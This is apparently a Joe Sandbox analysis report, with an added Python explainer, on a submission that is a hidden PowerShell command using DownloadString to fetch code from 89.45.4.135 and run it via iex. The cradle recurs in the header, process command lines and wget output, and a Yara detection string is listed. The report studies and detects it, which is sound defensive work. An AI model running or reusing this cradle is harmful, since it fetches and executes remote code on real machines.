ID: 293499 Cookbook: urldownload.jbs Time: 00:36:25 Date: 06/10/2020 Version: 30.0.0 Red Diamond
Table of Contents
Analysis Report: http://powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex
  Overview: General Information; Detection; Signatures; Classification; Startup; Malware Configuration; Yara Overview (Dropped Files, Memory Dumps); Sigma Overview; Signature Overview; Mitre Att&ck Matrix; Behavior Graph; Screenshots (Thumbnails)
  Antivirus, Machine Learning and Genetic Malware Detection: Initial Sample; Dropped Files; Unpacked PE Files; Domains; URLs
  Domains and IPs: Contacted Domains; URLs from Memory and Binaries; Contacted IPs (Public)
  General Information
  Simulations: Behavior and APIs
  Joe Sandbox View / Context: IPs; Domains; ASN; JA3 Fingerprints; Dropped Files
  Created / dropped Files
  Static File Info
  Network Behavior
  Code Manipulations
  Statistics
  Behavior: System Behavior (Analysis Process: cmd.exe PID: 3844 Parent PID: 2216; Analysis Process: conhost.exe PID: 6000 Parent PID: 3844; Analysis Process: wget.exe PID: 6600 Parent PID: 3844)
  Disassembly: Code Analysis
Copyright null 2020 Page 2 of 13
Analysis Report http://powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex
Overview
General Information
Sample URL: powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex
Analysis ID: 293499
Most interesting Screenshot: (image not reproduced)
Score: 0 Range: 0 - 100 Whitelisted: false Confidence: 100%
Detection: scale malicious / suspicious / clean (result: clean, see Score)
Signatures: Yara signature match
Classification: radar chart over the categories Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware (image not reproduced)
Startup
System is w10x64
cmd.exe (PID: 3844, cmdline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden %22(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex' > cmdline.out 2>&1, MD5: F3BDBE3BB6F734E357235F4D5898582D)
  conhost.exe (PID: 6000, cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  wget.exe (PID: 6600, cmdline: wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden %22(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex', MD5: 3DADB6E2ECE9C4B3E1E322E617658B60)
cleanup
Malware Configuration
No configs have been found
Yara Overview
Dropped Files
Source: C:\Users\user\Desktop\cmdline.out
Rule: Suspicious_PowerShell_WebDownload_1 (Detects suspicious PowerShell code that downloads from web sites), Author: Florian Roth
Strings: $s2 as system.net.webclient).downloadstring('http at 0xc7, 0x16e, 0x1ed
Memory Dumps
Source: 00000002.00000002.648721925.00000000009CC000.00000004.00000010.sdmp
Rule: Suspicious_PowerShell_WebDownload_1 (Detects suspicious PowerShell code that downloads from web sites), Author: Florian Roth
Strings: $s2 as system.net.webclient).downloadstring('http at 0x1e17

Source: 00000002.00000002.648747773.0000000000B36000.00000004.00000040.sdmp
Rule: Suspicious_PowerShell_WebDownload_1 (Detects suspicious PowerShell code that downloads from web sites), Author: Florian Roth
Strings: $s2 as System.Net.WebClient).DownloadString('http at 0x111d, 0x13dc, 0x1544, 0x17ba; as system.net.webclient).downloadstring('http at 0x147b, 0x16fa, 0x1863, 0x1917, 0x19e2, 0x1ac3, 0x1b62, 0x2133, 0x2343, 0x23c2, 0x4d84

Source: 00000002.00000002.648737499.0000000000B30000.00000004.00000040.sdmp
Rule: Suspicious_PowerShell_WebDownload_1 (Detects suspicious PowerShell code that downloads from web sites), Author: Florian Roth
Strings: $s2 as System.Net.WebClient).DownloadString('http at 0x258d, 0x2784, 0x290c

Source: 00000002.00000002.648770155.0000000000D50000.00000004.00000020.sdmp
Rule: Suspicious_PowerShell_WebDownload_1 (Detects suspicious PowerShell code that downloads from web sites), Author: Florian Roth
Strings: $s2 as System.Net.WebClient).DownloadString('http at 0x3a6b

Source: Process Memory Space: wget.exe PID: 6600
Rule: Suspicious_PowerShell_WebDownload_1 (Detects suspicious PowerShell code that downloads from web sites), Author: Florian Roth
Strings: $s2 as System.Net.WebClient).DownloadString('http at 0x7e3, 0x943, 0x46d7, 0x4837, 0x5103, 0x6ac2, 0x6c28, 0x6daa, 0x6efe, 0x935e6, 0x93783, 0x937ef, 0x93a1e; as system.net.webclient).downloadstring('http at 0xd11, 0x1172, 0x131e, 0x92d6f, 0x9388c, 0x9392a, 0x93afe, 0x93bd1
Sigma Overview
No Sigma rule has matched
Signature Overview
• Networking
• System Summary
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
There are no malicious signatures.
Mitre Att&ck Matrix
(One tactic per line, with the two techniques the matrix shows for it; a trailing "1" marks a technique the report counts one signature against.)
Initial Access: Valid Accounts; Default Accounts
Execution: Windows Management Instrumentation; Scheduled Task/Job
Persistence: Path Interception; Boot or Logon Initialization Scripts
Privilege Escalation: Process Injection 1; Boot or Logon Initialization Scripts
Defense Evasion: Masquerading 1; Process Injection 1
Credential Access: OS Credential Dumping; LSASS Memory
Discovery: Security Software Discovery 1; System Information Discovery 1
Lateral Movement: Remote Services; Remote Desktop Protocol
Collection: Data from Local System; Data from Removable Media
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth
Command and Control: Data Obfuscation; Junk Data
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization
Impact: Modify System Partition; Device Lockout
Behavior Graph
(Graph image not reproduced. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C/C++ or other language, Is malicious, Internet.)
Behavior Graph ID: 293499; URL: http://powershell.exe -exec...; Startdate: 06/10/2020; Architecture: WINDOWS; Score: 0
Nodes: cmd.exe (labelled 2) started wget.exe and conhost.exe; wget.exe (labelled 1); Internet node 89.45.4.135 (M247GB, Romania).
Screenshots
Thumbnails
Antivirus, Machine Learning and Genetic Malware Detection
Initial Sample
No Antivirus matches
Dropped Files
No Antivirus matches
Unpacked PE Files
No Antivirus matches
Domains
No Antivirus matches
URLs
Source | Detection | Scanner | Label
powershell.exe%20-executionpolicy%20bypass%20-noprofile%20-windowstyle%20hidden%20%22(new-obj | 0% | Avira URL Cloud | safe
89.45.4.135:80/)%20%7C%20iexofil | 0% | Avira URL Cloud | safe
89.45.4.135:80/) | 0% | Avira URL Cloud | safe
89.45.4.135:80/)%20%7C%20iex | 0% | Avira URL Cloud | safe
powershell.exe | 0% | Avira URL Cloud | safe
Domains and IPs
Contacted Domains
No contacted domains info
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
powershell.exe%20-executionpolicy%20bypass%20-noprofile%20-windowstyle%20hidden%20%22(new-obj | wget.exe, 00000002.00000002.648747773.0000000000B36000.00000004.00000040.sdmp, cmdline.out.2.dr | false | Avira URL Cloud: safe | low
89.45.4.135:80/)%20%7C%20iexofil | wget.exe, 00000002.00000002.648747773.0000000000B36000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
89.45.4.135:80/) | wget.exe, 00000002.00000002.648747773.0000000000B36000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
89.45.4.135:80/)%20%7C%20iex | wget.exe, 00000002.00000002.648747773.0000000000B36000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
powershell.exe | wget.exe, 00000002.00000002.648737499.0000000000B30000.00000004.00000040.sdmp; wget.exe, 00000002.00000002.648747773.0000000000B36000.00000004.00000040.sdmp | false | Avira URL Cloud: safe | unknown
Contacted IPs
Public
IP | Country | ASN | ASN Name | Malicious
89.45.4.135 | Romania | 9009 | M247GB | false
General Information
Joe Sandbox Version: 30.0.0 Red Diamond
Analysis ID: 293499
Start date: 06.10.2020
Start time: 00:36:25
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 1m 54s
Hypervisor based Inspection enabled: false
Report type: light
Cookbook file name: urldownload.jbs
Sample URL: powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex
Analysis system description: w10x64 Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes: 4
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: CLEAN
Classification: clean0.win@4/1@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information: Successful, ratio: 100%
Number of executed functions: 0
Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Enable AMSI; Unable to download file
Warnings: Exclude process from analysis (whitelisted): taskhostw.exe; VT rate limit hit for: http://powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex
Simulations
Behavior and APIs
No simulations
Joe Sandbox View / Context
IPs
No context
Domains
No context
ASN
No context
JA3 Fingerprints
No context
Dropped Files
No context
Created / dropped Files
C:\Users\user\Desktop\cmdline.out
Process: C:\Windows\SysWOW64\wget.exe
File Type: ASCII text, with CRLF line terminators
Size (bytes): 741
Entropy (8bit): 4.929920046548217
Encrypted: false
MD5: 36EAC5BF6D3352902F0B2170324B3F57
SHA1: 293ABA428298A73220CBA408B32101EFF9F0C2B7
SHA-256: 4F5F363CB62D03934BF6982DB0E2A0992F9E0AD29363833626B0CD0F45B11C91
SHA-512: 0B5F82CC554F039478A903DD1278FC04EF284EEBEDCB8ADC7EE900D3C036C90E2899F92ECA0C3D612AAAD482EDBFEF1092EC50D92CE935BE3FA5A518902F2359
Malicious: false
Yara Hits: Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: C:\Users\user\Desktop\cmdline.out, Author: Florian Roth
Reputation: low
Preview (line breaks restored):
idn_encode failed (-206): 'domain label longer than 63 characters'
--2020-10-06 00:37:13-- http://powershell.exe%20-executionpolicy%20bypass%20-noprofile%20-windowstyle%20hidden%20%22(new-object%20system.net.webclient).downloadstring('http//89.45.4.135:80/)%20%7C%20iex
Resolving powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(new-object system.net.webclient).downloadstring('http (powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(new-object system.net.webclient).downloadstring('http)... failed: No such host is known.
wget: unable to resolve host address 'powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "(new-object system.net.webclient).downloadstring(\'http'
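What the dropped file above actually records, reproduced as an added Python example (this is not code from the report, from Joe Sandbox, or from the Yara rule's author). Two things are taken from the report and everything else is assumed: the `$s2` string is copied from the hits as printed (`system.net.webclient).downloadstring('http`), and case-insensitive matching is inferred from the report listing hits in both original and lower case; the stand-in for cmdline.out is constructed from the command line in the Startup section, not the real 741-byte file. The submitted "URL" is a PowerShell command line, so wget (and any URL parser) takes everything up to the embedded `http:` as the host name; the second dot-separated label of that host is 78 characters, above the 63-character DNS label limit, which is the `idn_encode failed (-206)` line in the Preview. The resolver failure that follows is why Network Behavior is empty and the Cookbook Comments say "Unable to download file". The Yara hits are therefore on the submission echoed into wget's stderr and process memory, not on anything fetched from 89.45.4.135; the last function pulls that stage-2 URL out of the command, which is the indicator worth keeping from this report.

```python
"""
Added example (not from the report): reproduce two observations from this
analysis on constructed input.

1. The submitted "URL" is a PowerShell command line. A URL parser (like wget)
   takes everything up to the embedded "http:" as the host, whose second
   DNS label is longer than the 63-byte limit: the idn_encode failure.
2. Yara rule Suspicious_PowerShell_WebDownload_1 keyed on its $s2 string
   wherever the submission was echoed; report hits as hex offsets, the way
   the report prints them, and pull out the stage-2 URL as the real IOC.
"""
import re
from urllib.parse import urlsplit

# The string handed to the urldownload.jbs cookbook, as shown in the report.
SUBMITTED = (
    "http://powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden "
    "\"(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex"
)

MAX_LABEL = 63  # RFC 1035: a single DNS label is at most 63 octets

# $s2 of the rule, copied from the hits printed in the report. Assumption:
# the rule matches it case-insensitively (the report shows both spellings).
S2 = "system.net.webclient).downloadstring('http"

# Constructed stand-in for cmdline.out (wget's stderr). The real file is not
# reproduced here; these lines only mimic its shape: the submission echoed
# once percent-encoded and twice as the host name wget failed to resolve.
_HOST = urlsplit(SUBMITTED).hostname or ""
CMDLINE_OUT = "\r\n".join([
    "idn_encode failed (-206): 'domain label longer than 63 characters'",
    "--2020-10-06 00:37:13--  " + SUBMITTED.replace(" ", "%20").replace("|", "%7C"),
    "Resolving " + _HOST + "... failed: No such host is known.",
    "wget: unable to resolve host address '" + _HOST + "'",
])


def host_labels(url):
    """DNS labels of the host part, split the way a URL parser sees them."""
    host = urlsplit(url).hostname or ""
    return host.split(".") if host else []


def first_bad_label(url):
    """First label longer than MAX_LABEL, or None if every label is legal."""
    for label in host_labels(url):
        if len(label) > MAX_LABEL:
            return label
    return None


def yara_s2_hits(data):
    """Hex offsets of every $s2 occurrence, like the report's '0xc7:$s2' lines."""
    pattern = re.compile(re.escape(S2), re.IGNORECASE)
    return [hex(m.start()) for m in pattern.finditer(data)]


def stage2_urls(data):
    """URLs that DownloadString() would fetch: the indicator worth keeping.

    Stops at a quote, a closing parenthesis or whitespace, so it copes with the
    submission's missing closing quote before ') | iex'.
    """
    pattern = re.compile(r"downloadstring\('(https?://[^'\)\s]+)", re.IGNORECASE)
    return sorted({m.group(1) for m in pattern.finditer(data)})


if __name__ == "__main__":
    bad = first_bad_label(SUBMITTED)
    print(f"host as parsed: {_HOST!r}")
    print(f"over-long label ({len(bad)} chars): {bad!r}")
    print("yara $s2 hits in constructed cmdline.out:", yara_s2_hits(CMDLINE_OUT))
    print("stage-2 URL(s):", stage2_urls(CMDLINE_OUT))
```

Running the script prints the host name exactly as wget's "unable to resolve host address" line shows it, three `$s2` hits (one per echo of the submission, matching the three hits the report lists for cmdline.out), and the single stage-2 URL `http://89.45.4.135:80/`. Resubmitting that URL, or the command line as a file rather than a URL, is what would make the sandbox exercise the payload instead of wget's resolver.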
Static File Info
No static file info
Network Behavior
No network behavior found
Code Manipulations
Statistics
Behavior
• cmd.exe
• conhost.exe
• wget.exe
System Behavior
Analysis Process: cmd.exe PID: 3844 Parent PID: 2216
General
Start time: 00:37:11
Start date: 06/10/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden %22(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex' > cmdline.out 2>&1
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
File Activities
File Created
Source | File Path | Access | Attributes | Options | Completion | Count | Address | Symbol
| C:\Users\user\Desktop\cmdline.out | read attributes, synchronize, generic write | device | synchronous io non alert, non directory file | success or wait 1 | 1 | 11DD194 | CreateFileW
Analysis Process: conhost.exe PID: 6000 Parent PID: 3844
General
Start time: 00:37:11
Start date: 06/10/2020
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Analysis Process: wget.exe PID: 6600 Parent PID: 3844
General
Start time: 00:37:12
Start date: 06/10/2020
Path: C:\Windows\SysWOW64\wget.exe
Wow64 process (32bit): true
Commandline: wget -t 2 -v -T 60 -P 'C:\Users\user\Desktop\download' --no-check-certificate --content-disposition --user-agent='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like Gecko' 'http://powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden %22(New-Object System.Net.WebClient).DownloadString('http://89.45.4.135:80/) | iex'
Imagebase: 0x400000
File size: 3895184 bytes
MD5 hash: 3DADB6E2ECE9C4B3E1E322E617658B60
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches: Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Author: Florian Roth, in each of these sources:
  00000002.00000002.648721925.00000000009CC000.00000004.00000010.sdmp
  00000002.00000002.648747773.0000000000B36000.00000004.00000040.sdmp
  00000002.00000002.648737499.0000000000B30000.00000004.00000040.sdmp
  00000002.00000002.648770155.0000000000D50000.00000004.00000020.sdmp
Reputation: low
File Activities
Disassembly
Code Analysis